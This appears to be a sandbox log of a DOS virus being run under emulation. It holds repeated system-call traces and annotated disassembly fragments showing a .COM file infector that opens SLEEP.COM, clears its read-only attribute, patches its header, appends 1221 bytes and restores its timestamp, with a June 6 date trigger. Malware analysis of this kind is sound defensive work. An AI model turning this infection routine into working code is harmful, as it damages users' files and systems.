2018-12-25T12:03:28.830312002Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.839378756Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.842480393Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.854315924Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.856953536Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.865181959Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.86872615Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.872219314Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.876666528Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.879183987Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.889712151Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.892207405Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.901546727Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.913004238Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
; Dump following the "Get date" call logged on the line above (INT 21h AH=2Ah returns
; DH = month, DL = day), where `cmp dx, 0x606` tests for month 6, day 6. A match goes
; to 0x12d4f (not shown); any other date goes to 0x12dba. In this trace the
; non-matching path ran - the next logged calls are the "Change current directory"
; entries at PC 12dc5 and 12dcd - so the code at 0x12d4f was not exercised by this run.
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
; NOTE(review): execution does not continue past the unconditional jump above; the
; rest is the bytes that follow in memory, decoded linearly. 0x12b6c-0x12b74 look like
; data read as instructions, and the decode is out of step with the real code:
; `add byte ptr [di - 0x75], dl` encodes as 00 55 8B and `in al, dx` as EC, so a
; `push bp` / `mov bp, sp` prologue probably starts at 0x12b75 - confirm against the bytes.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2c bytes of stack, save SI, and continue at 0x12bed (not shown).
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
; INT 21h AH=1Ah: set the disk transfer address to the buffer at [bp - 0x2c].
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; Set-up for INT 21h AH=4Eh (find first) with attribute mask CX=0x10, which includes
; directory entries; the search pattern is at 0x1aa + word at [0x106]. The INT itself
; lies past the end of this dump.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.916853908Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.92207945Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.532182528Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.542355162Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.545578057Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.546724424Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.554646433Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.561544261Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.568173943Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Dump taken at the PC where the "Get time" call logged on the line above returned
; (INT 21h AH=2Ch: DH = seconds, DL = hundredths); `add dl, dh` has just summed the two.
; A zero sum branches back to 0x12caa, presumably to ask for the time again, so the
; byte stored below is never 0.
0x12cb0: je 0x12caa
; si = 0x115 + word at [0x106]; [0x106] looks like a base the code adds to its own
; data offsets (TODO confirm). The time-derived byte is stored there; what it is
; used for is not visible in this fragment.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
; INT 21h AX=4301h with CX=0: set the attributes of the path at DX = si + 0xbc to
; none, which removes read-only. Logged as "Get or set file attributes", PC 12cc8.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h AH=3Eh: close the handle in BX (presumably the one opened at PC 12c31).
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h AX=3D02h: open for read/write; DX is not reloaded, so it is the same path.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave through 0x12c52 (not shown).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at es:[dx + 0x62], then move it into BX, where the
; write calls logged next expect it.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.570555426Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.58650975Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.588124219Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.595108036Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.598264804Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.601043922Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.603772087Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.606195966Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.615037963Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.61647815Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.624093098Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.634068628Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.637227209Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.650710494Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.65685746Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.658771215Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.67083839Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.672580445Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.679261628Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.683137843Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.68619577Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.688985208Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.69207092Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.702943776Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.704337177Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.712326762Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.722405075Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.725259557Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.732098549Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.738708806Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.741081989Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.750986143Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.753200435Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.759851221Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.762435712Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.765853574Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.768324517Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.770329131Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.780258191Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.781728512Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.789399141Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.799991317Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
; Dump following the "Get date" call logged on the line above (INT 21h AH=2Ah returns
; DH = month, DL = day), where `cmp dx, 0x606` tests for month 6, day 6. A match goes
; to 0x12d4f (not shown); any other date goes to 0x12dba. In this trace the
; non-matching path ran - the next logged calls are the "Change current directory"
; entries at PC 12dc5 and 12dcd - so the code at 0x12d4f was not exercised by this run.
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
; NOTE(review): execution does not continue past the unconditional jump above; the
; rest is the bytes that follow in memory, decoded linearly. 0x12b6c-0x12b74 look like
; data read as instructions, and the decode is out of step with the real code:
; `add byte ptr [di - 0x75], dl` encodes as 00 55 8B and `in al, dx` as EC, so a
; `push bp` / `mov bp, sp` prologue probably starts at 0x12b75 - confirm against the bytes.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2c bytes of stack, save SI, and continue at 0x12bed (not shown).
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
; INT 21h AH=1Ah: set the disk transfer address to the buffer at [bp - 0x2c].
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; Set-up for INT 21h AH=4Eh (find first) with attribute mask CX=0x10, which includes
; directory entries; the search pattern is at 0x1aa + word at [0x106]. The INT itself
; lies past the end of this dump.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:28.802372692Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:28.806569517Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.741073619Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.745388614Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.75053577Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.752282982Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.765630127Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.779639121Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.786880593Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Dump taken at the PC where the "Get time" call logged on the line above returned
; (INT 21h AH=2Ch: DH = seconds, DL = hundredths); `add dl, dh` has just summed the two.
; A zero sum branches back to 0x12caa, presumably to ask for the time again, so the
; byte stored below is never 0.
0x12cb0: je 0x12caa
; si = 0x115 + word at [0x106]; [0x106] looks like a base the code adds to its own
; data offsets (TODO confirm). The time-derived byte is stored there; what it is
; used for is not visible in this fragment.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
; INT 21h AX=4301h with CX=0: set the attributes of the path at DX = si + 0xbc to
; none, which removes read-only. Logged as "Get or set file attributes", PC 12cc8.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h AH=3Eh: close the handle in BX (presumably the one opened at PC 12c31).
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h AX=3D02h: open for read/write; DX is not reloaded, so it is the same path.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave through 0x12c52 (not shown).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at es:[dx + 0x62], then move it into BX, where the
; write calls logged next expect it.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.789281358Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.808284372Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.809852141Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.815099966Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.818906747Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.823633069Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.826334243Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.834272446Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.845881725Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.84804859Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.857998047Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.870038432Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.873472832Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.881555559Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.88962277Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.892512707Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:28.904121885Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:28.907193803Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:28.915898862Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:28.91945983Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:28.923644385Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:28.926946464Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:28.929538526Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:28.947594114Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:28.94973058Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:28.961137593Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:28.973968122Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:28.977623718Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:28.985597468Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:28.994565663Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:28.997656567Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.009487122Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.012465067Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.020830403Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.024338556Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.027549334Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.031678818Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.034239104Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.044742492Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.047834351Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.057278939Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.06856161Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
; Dump following the "Get date" call logged on the line above (INT 21h AH=2Ah returns
; DH = month, DL = day), where `cmp dx, 0x606` tests for month 6, day 6. A match goes
; to 0x12d4f (not shown); any other date goes to 0x12dba. In this trace the
; non-matching path ran - the next logged calls are the "Change current directory"
; entries at PC 12dc5 and 12dcd - so the code at 0x12d4f was not exercised by this run.
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
; NOTE(review): execution does not continue past the unconditional jump above; the
; rest is the bytes that follow in memory, decoded linearly. 0x12b6c-0x12b74 look like
; data read as instructions, and the decode is out of step with the real code:
; `add byte ptr [di - 0x75], dl` encodes as 00 55 8B and `in al, dx` as EC, so a
; `push bp` / `mov bp, sp` prologue probably starts at 0x12b75 - confirm against the bytes.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2c bytes of stack, save SI, and continue at 0x12bed (not shown).
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
; INT 21h AH=1Ah: set the disk transfer address to the buffer at [bp - 0x2c].
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; Set-up for INT 21h AH=4Eh (find first) with attribute mask CX=0x10, which includes
; directory entries; the search pattern is at 0x1aa + word at [0x106]. The INT itself
; lies past the end of this dump.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.07199178Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.083794376Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:28.879366588Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:28.883403367Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:28.887730577Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:28.889117787Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:28.900832396Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.912078477Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:28.918733626Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Dump taken at the PC where the "Get time" call logged on the line above returned
; (INT 21h AH=2Ch: DH = seconds, DL = hundredths); `add dl, dh` has just summed the two.
; A zero sum branches back to 0x12caa, presumably to ask for the time again, so the
; byte stored below is never 0.
0x12cb0: je 0x12caa
; si = 0x115 + word at [0x106]; [0x106] looks like a base the code adds to its own
; data offsets (TODO confirm). The time-derived byte is stored there; what it is
; used for is not visible in this fragment.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
; INT 21h AX=4301h with CX=0: set the attributes of the path at DX = si + 0xbc to
; none, which removes read-only. Logged as "Get or set file attributes", PC 12cc8.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h AH=3Eh: close the handle in BX (presumably the one opened at PC 12c31).
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h AX=3D02h: open for read/write; DX is not reloaded, so it is the same path.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave through 0x12c52 (not shown).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at es:[dx + 0x62], then move it into BX, where the
; write calls logged next expect it.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:28.921784216Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:28.938473073Z 62 PC: 12ccc | Close file
2018-12-25T12:03:28.940772709Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:28.947724238Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:28.951832615Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.95435756Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:28.957224328Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:28.959601455Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:28.968823786Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:28.970195173Z 62 PC: 12d37 | Close file
2018-12-25T12:03:28.981865374Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:28.991406888Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:28.994588001Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.001320212Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.00748277Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.009327735Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.019594356Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.021162555Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.027489452Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.03059174Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.03303063Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.035492373Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.038084937Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.04721247Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.048786923Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.057715194Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.067792729Z 79 PC: 12c19 | Find next file (See above)
2018-12-25T12:03:29.070602059Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.077791949Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.084053514Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.086339922Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.096950426Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.099992617Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.106950458Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.110264028Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.113482654Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.116812193Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.118885531Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.129101699Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.130791582Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.138480673Z 67 PC: 12d4a | Get or set file attributes (See above)
2018-12-25T12:03:29.148584519Z 42 PC: 12b60 | Get date 0x12b60: cmp dx, 0x606
; Dump following the "Get date" call logged on the line above (INT 21h AH=2Ah returns
; DH = month, DL = day), where `cmp dx, 0x606` tests for month 6, day 6. A match goes
; to 0x12d4f (not shown); any other date goes to 0x12dba. In this trace the
; non-matching path ran - the next logged calls are the "Change current directory"
; entries at PC 12dc5 and 12dcd - so the code at 0x12d4f was not exercised by this run.
0x12b64: je 0x12b69
0x12b66: jmp 0x12dba
0x12b69: jmp 0x12d4f
; NOTE(review): execution does not continue past the unconditional jump above; the
; rest is the bytes that follow in memory, decoded linearly. 0x12b6c-0x12b74 look like
; data read as instructions, and the decode is out of step with the real code:
; `add byte ptr [di - 0x75], dl` encodes as 00 55 8B and `in al, dx` as EC, so a
; `push bp` / `mov bp, sp` prologue probably starts at 0x12b75 - confirm against the bytes.
0x12b6c: and ah, bh
0x12b6e: movsw word ptr es:[di], word ptr [si]
0x12b6f: mov ax, 0x5c4c
0x12b72: add word ptr [di], ax
0x12b74: add byte ptr [di - 0x75], dl
0x12b77: in al, dx
; Reserve 0x2c bytes of stack, save SI, and continue at 0x12bed (not shown).
0x12b78: sub sp, 0x2c
0x12b7b: push si
0x12b7c: jmp 0x12bed
; INT 21h AH=1Ah: set the disk transfer address to the buffer at [bp - 0x2c].
0x12b7e: mov ah, 0x1a
0x12b80: lea dx, word ptr [bp - 0x2c]
0x12b83: int 0x21
; Set-up for INT 21h AH=4Eh (find first) with attribute mask CX=0x10, which includes
; directory entries; the search pattern is at 0x1aa + word at [0x106]. The INT itself
; lies past the end of this dump.
0x12b85: mov ah, 0x4e
0x12b87: mov cx, 0x10
0x12b8a: mov dx, 0x1aa
0x12b8d: add dx, word ptr [0x106]
2018-12-25T12:03:29.150868341Z 59 PC: 12dc5 | Change current directory
2018-12-25T12:03:29.154983604Z 59 PC: 12dcd | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8112,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:03:29.212689982Z 71 PC: 12b37 | Get current directory
2018-12-25T12:03:29.217036729Z 59 PC: 12b43 | Change current directory
2018-12-25T12:03:29.221068908Z 26 PC: 12bf8 | Set disk transfer address
2018-12-25T12:03:29.222832695Z 78 PC: 12c06 | Find first file
2018-12-25T12:03:29.229348037Z 61 PC: 12c31 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.235804022Z 63 PC: 12c43 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:03:29.242045861Z 44 PC: 12cae | Get time 0x12cae: add dl, dh
; Dump taken at the PC where the "Get time" call logged on the line above returned
; (INT 21h AH=2Ch: DH = seconds, DL = hundredths); `add dl, dh` has just summed the two.
; A zero sum branches back to 0x12caa, presumably to ask for the time again, so the
; byte stored below is never 0.
0x12cb0: je 0x12caa
; si = 0x115 + word at [0x106]; [0x106] looks like a base the code adds to its own
; data offsets (TODO confirm). The time-derived byte is stored there; what it is
; used for is not visible in this fragment.
0x12cb2: mov si, 0x115
0x12cb5: add si, word ptr [0x106]
0x12cb9: mov byte ptr [si], dl
; INT 21h AX=4301h with CX=0: set the attributes of the path at DX = si + 0xbc to
; none, which removes read-only. Logged as "Get or set file attributes", PC 12cc8.
0x12cbb: mov ax, 0x4301
0x12cbe: xor cx, cx
0x12cc0: mov dx, si
0x12cc2: add dx, 0xbc
0x12cc6: int 0x21
; INT 21h AH=3Eh: close the handle in BX (presumably the one opened at PC 12c31).
0x12cc8: mov ah, 0x3e
0x12cca: int 0x21
; INT 21h AX=3D02h: open for read/write; DX is not reloaded, so it is the same path.
0x12ccc: mov ax, 0x3d02
0x12ccf: int 0x21
; Carry clear means the open succeeded; otherwise leave through 0x12c52 (not shown).
0x12cd1: jae 0x12cd6
0x12cd3: jmp 0x12c52
; Save the new handle (AX) at es:[dx + 0x62], then move it into BX, where the
; write calls logged next expect it.
0x12cd6: mov di, dx
0x12cd8: add di, 0x62
0x12cdc: stosw word ptr es:[di], ax
0x12cdd: xchg ax, bx
2018-12-25T12:03:29.251077219Z 67 PC: 12cc8 | Get or set file attributes
2018-12-25T12:03:29.266500122Z 62 PC: 12ccc | Close file
2018-12-25T12:03:29.268210194Z 61 PC: 12cd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:29.274806525Z 64 PC: 12ce8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:03:29.284241362Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.286935636Z 64 PC: 12d10 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:03:29.290091616Z 66 PC: 12d19 | Move file pointer
2018-12-25T12:03:29.292687656Z 64 PC: 12a84 | Write file or device (Write 1221 bytes on handle 5)
2018-12-25T12:03:29.303081019Z 87 PC: 12d33 | Get or set file date and time
2018-12-25T12:03:29.304568583Z 62 PC: 12d37 | Close file
2018-12-25T12:03:29.312713069Z 67 PC: 12d4a | Get or set file attributes
2018-12-25T12:03:29.32236073Z 79 PC: 12c19 | Find next file
2018-12-25T12:03:29.324895936Z 61 PC: 12c31 | Open file (See above)
2018-12-25T12:03:29.338627802Z 63 PC: 12c43 | Read file or device (See above)
2018-12-25T12:03:29.345026978Z 44 PC: 12cae | Get time (See above)
2018-12-25T12:03:29.347153935Z 67 PC: 12cc8 | Get or set file attributes (See above)
2018-12-25T12:03:29.357550708Z 62 PC: 12ccc | Close file (See above)
2018-12-25T12:03:29.359516617Z 61 PC: 12cd1 | Open file (See above)
2018-12-25T12:03:29.371176513Z 64 PC: 12ce8 | Write file or device (See above)
2018-12-25T12:03:29.378720552Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T12:03:29.381544735Z 64 PC: 12d10 | Write file or device (See above)
2018-12-25T12:03:29.384404773Z 66 PC: 12d19 | Move file pointer (See above)
2018-12-25T12:03:29.386689801Z 64 PC: 12a84 | Write file or device (See above)
2018-12-25T12:03:29.395708919Z 87 PC: 12d33 | Get or set file date and time (See above)
2018-12-25T12:03:29.397232721Z 62 PC: 12d37 | Close file (See above)
2018-12-25T12:03:29.405354635Z 67 PC: 12d4a | Get or set file attributes (See above)
